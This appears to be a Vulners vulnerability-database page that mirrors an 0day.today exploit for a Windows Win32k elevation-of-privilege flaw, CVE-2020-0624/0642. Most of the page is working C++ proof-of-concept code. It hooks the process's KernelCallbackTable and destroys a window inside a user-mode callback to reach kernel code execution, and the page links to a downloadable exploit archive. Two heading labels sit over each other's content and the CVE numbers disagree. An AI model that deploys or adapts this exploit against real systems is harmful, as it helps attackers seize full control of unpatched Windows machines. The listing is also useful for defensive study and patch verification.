Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

Microsoft Windows Win32k Privilege Escalation Exploit

🗓️ 03 Aug 2020 00:00:00Reported by nu11secur1tyType 
zdt
 zdt🔗 0day.today👁 165 Views

Microsoft Windows Win32k Privilege Escalation Exploit. Elevation of privilege vulnerability in Windows Win32k component allows arbitrary code execution in kernel mode, enabling unauthorized actions on the system

Related
Code
ReporterTitlePublishedViews
Family
0day.today		Microsoft Windows - Win32k Elevation of Privilege Exploit
2 Dec 202000:00
zdt
BDU FSTEC		The vulnerability of the win32k component of the Windows operating system, which allows a hacker to increase their privileges
20 Jan 202000:00
bdu_fstec
BDU FSTEC		The vulnerability of the Win32k component of the Windows operating system, which allows a hacker to increase their privileges
22 Jan 202000:00
bdu_fstec
Circl		CVE-2020-0624
26 Nov 202215:03
circl
CNVD		Microsoft Win32k Component Elevation of Privilege Vulnerability
21 Jan 202000:00
cnvd
CNVD		Microsoft Windows and Microsoft Windows Server Privilege Mobilization Vulnerability (CNVD-2020-03546)
16 Jan 202000:00
cnvd
CVE		CVE-2020-0624
14 Jan 202023:11
cve
CVE		CVE-2020-0642
14 Jan 202023:11
cve
Cvelist		CVE-2020-0624
14 Jan 202023:11
cvelist
Cvelist		CVE-2020-0642
14 Jan 202023:11
cvelist
Rows per page
# Exploit Title: Microsoft Windows Win32k Privilege Escalation
# Author: nu11secur1ty
# Exploit Date: 01/14/2020
# Vendor: Microsoft
# Software Link:
https://support.microsoft.com/en-us/help/3095649/win32k-sys-update-in-windows-october-2015
# Exploit link:
https://github.com/nu11secur1ty/Windows10Exploits/raw/master/Undefined/CVE-2020-0624/win32k/__32-win32k.sys5.1.2600.1330.zip
# CVE: CVE-2020-0642


[+] Credits: Ventsislav Varbanovski (nu11secur1ty)
[+] Source:  readme from GitHUB


[Exploit Program Code]

// cve-2020-0624.cpp

#pragma warning(disable: 4005)
#pragma warning(disable: 4054)
#pragma warning(disable: 4152)
#pragma warning(disable: 4201)

#include <Windows.h>
#include "ntos.h"

typedef NTSTATUS(NTAPI* PFNUSER32CALLBACK)(PVOID);

HWND hParent{}, hChild{};
BOOL Flag1{}, Flag2{};

PFNUSER32CALLBACK OrgCCI2{}, OrgCCI3{};

NTSTATUS NTAPI NewCCI2(PVOID Param)
{
  if (Flag1)
  {
    Flag1 = FALSE;
    Flag2 = TRUE;
    DestroyWindow(hParent);
  }
  return OrgCCI2(Param);
}
NTSTATUS NTAPI NewCCI3(PVOID Param)
{
  if (Flag2)
  {
    ExitThread(0);
  }
  return OrgCCI3(Param);
}
int main()
{
  DWORD OldProtect{};

  PTEB teb = NtCurrentTeb();
  PPEB peb = teb->ProcessEnvironmentBlock;
  PVOID pCCI2 = &((PVOID*)peb->KernelCallbackTable)[2];
  if (!VirtualProtect(pCCI2, sizeof(PVOID), PAGE_EXECUTE_READWRITE, &OldProtect))
    return 0;
  OrgCCI2 = (PFNUSER32CALLBACK)InterlockedExchangePointer((PVOID*)pCCI2,
&NewCCI2);

  PVOID pCCI3 = &((PVOID*)peb->KernelCallbackTable)[3];
  if (!VirtualProtect(pCCI3, sizeof(PVOID), PAGE_EXECUTE_READWRITE, &OldProtect))
    return 0;
  OrgCCI3 = (PFNUSER32CALLBACK)InterlockedExchangePointer((PVOID*)pCCI3,
&NewCCI3);

  hParent = CreateWindow(L"ScrollBar", L"Parent", WS_OVERLAPPEDWINDOW,
CW_USEDEFAULT, CW_USEDEFAULT, 10, 10, NULL, NULL, NULL, NULL);
  hChild = CreateWindow(L"ScrollBar", L"Child", WS_OVERLAPPEDWINDOW |
WS_VISIBLE, CW_USEDEFAULT, CW_USEDEFAULT, 10, 10, NULL, 0, NULL,
NULL);
  Flag1 = TRUE;
  SendMessage(hChild, WM_LBUTTONDOWN, 0, 0);
  return 0;
}


[Vendor]
Microsoft


[Vulnerability Type]
Privilege Escalation


[Description]
The entry creation date may reflect when the CVE ID was allocated or
reserved, and does not necessarily indicate when this vulnerability
was discovered, shared with the affected vendor, publicly disclosed,
or updated in CVE.
- - - more: https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0642

[Disclosure Timeline]
An elevation of privilege vulnerability exists in Windows when the
Win32k component fails to properly handle objects in memory. An
attacker who successfully exploited this vulnerability could run
arbitrary code in kernel mode. An attacker could then install
programs; view, change, or delete data; or create new accounts with
full user rights.
To exploit this vulnerability, an attacker would first have to log on
to the system. An attacker could then run a specially crafted
application that could exploit the vulnerability and take control of
an affected system.
The update addresses this vulnerability by correcting how Win32k
handles objects in memory.

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
03 Aug 2020 00:00Current
0.7Low risk
Vulners AI Score0.7
CVSS 27.2
CVSS 3.17.8
EPSS0.14539
microsoft windowswin32kprivilege escalationelevation of privilegearbitrary code executionkernel modeexploitvulnerability
165